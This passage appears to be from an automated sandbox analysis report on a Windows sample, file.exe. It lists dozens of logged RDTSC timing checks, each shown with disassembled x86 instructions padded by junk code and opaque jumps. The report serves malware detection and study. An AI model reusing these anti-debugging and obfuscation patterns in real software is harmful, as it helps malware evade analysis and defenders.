                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922622 second address: 922670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5092E62h 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FAAC5092E61h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007FAAC5092E56h 0x0000001c jmp 00007FAAC5092E69h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922670 second address: 922676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9227D1 second address: 9227D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922EF4 second address: 922F04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FAAC5254A86h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922F04 second address: 922F27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jno 00007FAAC5092E56h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925CD8 second address: 925CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925CE0 second address: 925CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925CE6 second address: 925D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D1DB0h], esi 0x0000000f push 00000000h 0x00000011 add dword ptr [ebp+122D18A3h], edi 0x00000017 push 417BA398h 0x0000001c push esi 0x0000001d jo 00007FAAC5254A8Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925D0B second address: 925DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 xor dword ptr [esp], 417BA318h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FAAC5092E58h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov ecx, edx 0x00000028 push 00000003h 0x0000002a and edx, 2E10935Bh 0x00000030 sub dword ptr [ebp+122D1C7Eh], edi 0x00000036 push 00000000h 0x00000038 mov edi, dword ptr [ebp+122D2CBBh] 0x0000003e push 00000003h 0x00000040 push 00000000h 0x00000042 push esi 0x00000043 call 00007FAAC5092E58h 0x00000048 pop esi 0x00000049 mov dword ptr [esp+04h], esi 0x0000004d add dword ptr [esp+04h], 00000015h 0x00000055 inc esi 0x00000056 push esi 0x00000057 ret 0x00000058 pop esi 0x00000059 ret 0x0000005a or dword ptr [ebp+122D2878h], edx 0x00000060 jmp 00007FAAC5092E62h 0x00000065 call 00007FAAC5092E59h 0x0000006a jmp 00007FAAC5092E60h 0x0000006f push eax 0x00000070 jmp 00007FAAC5092E5Fh 0x00000075 mov eax, dword ptr [esp+04h] 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007FAAC5092E67h 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925DD2 second address: 925E7C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FAAC5254A98h 0x0000000f jno 00007FAAC5254A9Fh 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jo 00007FAAC5254A98h 0x00000020 push edi 0x00000021 jmp 00007FAAC5254A90h 0x00000026 pop edi 0x00000027 pop eax 0x00000028 jmp 00007FAAC5254A96h 0x0000002d lea ebx, dword ptr [ebp+12457A71h] 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FAAC5254A88h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D2148h], edi 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 jne 00007FAAC5254A86h 0x0000005f popad 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925E7C second address: 925E92 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAAC5092E58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e js 00007FAAC5092E5Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925F3E second address: 925FCD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAAC5254A8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 0FFF5D8Eh 0x00000011 mov dword ptr [ebp+122D1DF0h], edi 0x00000017 push 00000003h 0x00000019 or dword ptr [ebp+122D1960h], eax 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007FAAC5254A88h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b mov edx, 106A355Eh 0x00000040 push 00000003h 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007FAAC5254A88h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 00000015h 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c adc edx, 4DD7B2C7h 0x00000062 sub dword ptr [ebp+122D2947h], edi 0x00000068 call 00007FAAC5254A89h 0x0000006d push eax 0x0000006e push edx 0x0000006f jng 00007FAAC5254A8Ch 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925FCD second address: 925FD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925FD3 second address: 925FED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAC5254A8Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925FED second address: 925FF7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAAC5092E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925FF7 second address: 925FFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925FFE second address: 926013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FAAC5092E56h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926013 second address: 926017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926017 second address: 92601D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92601D second address: 926023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926023 second address: 926027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926027 second address: 92605B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAC5254A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jno 00007FAAC5254A9Dh 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915956 second address: 91597A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAAC5092E64h 0x00000008 jmp 00007FAAC5092E5Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAAC5092E5Ah 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944AE4 second address: 944B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A91h 0x00000009 jnp 00007FAAC5254A8Ch 0x0000000f jns 00007FAAC5254A86h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944B05 second address: 944B25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jl 00007FAAC5092E56h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944B25 second address: 944B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944B2D second address: 944B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAAC5092E56h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944CB8 second address: 944CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944CBC second address: 944CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAAC5092E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007FAAC5092E5Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944E67 second address: 944E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944E6C second address: 944E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944E72 second address: 944E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945593 second address: 945599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945599 second address: 9455D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A8Fh 0x00000007 jmp 00007FAAC5254A8Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jp 00007FAAC5254A86h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FAAC5254A93h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945842 second address: 945851 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAC5092E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945851 second address: 945865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FAAC5254A8Ch 0x0000000e jc 00007FAAC5254A86h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945865 second address: 945879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnl 00007FAAC5092E56h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FAAC5092E56h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946312 second address: 94632B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FAAC5254A93h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94632B second address: 94632F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946A5D second address: 946A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A8Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946A6C second address: 946A72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A043 second address: 94A052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A8Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A052 second address: 94A056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A056 second address: 94A070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAAC5254A8Ch 0x0000000d jo 00007FAAC5254A86h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A070 second address: 94A074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910887 second address: 9108A2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAC5254A86h 0x00000008 jmp 00007FAAC5254A91h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9108A2 second address: 9108A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D06F second address: 94D0B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FAAC5254A99h 0x00000011 jmp 00007FAAC5254A94h 0x00000016 jnc 00007FAAC5254A86h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94FF26 second address: 94FF2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C4EF second address: 91C501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAAC5254A86h 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FAAC5254A86h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C501 second address: 91C507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C507 second address: 91C50C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95342E second address: 95344F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E69h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953E29 second address: 953E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FAAC5254A88h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953E36 second address: 953E3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954E17 second address: 954E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954E1E second address: 954E23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954E23 second address: 954E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007FAAC5254A88h 0x0000000f jbe 00007FAAC5254A8Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954E99 second address: 954E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955A1A second address: 955A21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955A21 second address: 955A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FAAC5092E58h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 jmp 00007FAAC5092E63h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push esi 0x0000002b pushad 0x0000002c popad 0x0000002d pop esi 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955B25 second address: 955B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955B29 second address: 955B41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955E38 second address: 955E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955E3E second address: 955E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955F42 second address: 955F48 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955F48 second address: 955F4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956517 second address: 9565A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FAAC5254A88h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 call 00007FAAC5254A8Ah 0x0000002e jmp 00007FAAC5254A8Fh 0x00000033 pop edi 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 pushad 0x00000038 call 00007FAAC5254A98h 0x0000003d pop ecx 0x0000003e add bx, DA72h 0x00000043 popad 0x00000044 pop esi 0x00000045 xchg eax, ebx 0x00000046 jmp 00007FAAC5254A8Ch 0x0000004b push eax 0x0000004c pushad 0x0000004d jnc 00007FAAC5254A8Ch 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A159 second address: 95A15D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A15D second address: 95A180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FAAC5254A88h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FAAC5254A91h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AC7A second address: 95AD0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FAAC5092E58h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 cmc 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FAAC5092E58h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000017h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007FAAC5092E58h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 00000018h 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f mov si, 3000h 0x00000063 mov dword ptr [ebp+122D1B16h], ecx 0x00000069 xchg eax, ebx 0x0000006a push eax 0x0000006b push edx 0x0000006c jne 00007FAAC5092E5Ch 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AA3E second address: 95AA5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAC5254A98h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B709 second address: 95B716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FAAC5092E56h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B716 second address: 95B7AB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAC5254A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FAAC5254A8Ch 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FAAC5254A88h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D1C9Bh], ebx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FAAC5254A88h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 jne 00007FAAC5254A86h 0x00000056 xchg eax, ebx 0x00000057 jmp 00007FAAC5254A8Ch 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jg 00007FAAC5254A9Dh 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960F97 second address: 961021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FAAC5092E58h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 jmp 00007FAAC5092E5Fh 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007FAAC5092E58h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov ebx, 5ADC47C2h 0x00000048 push 00000000h 0x0000004a jmp 00007FAAC5092E64h 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jmp 00007FAAC5092E62h 0x00000058 push eax 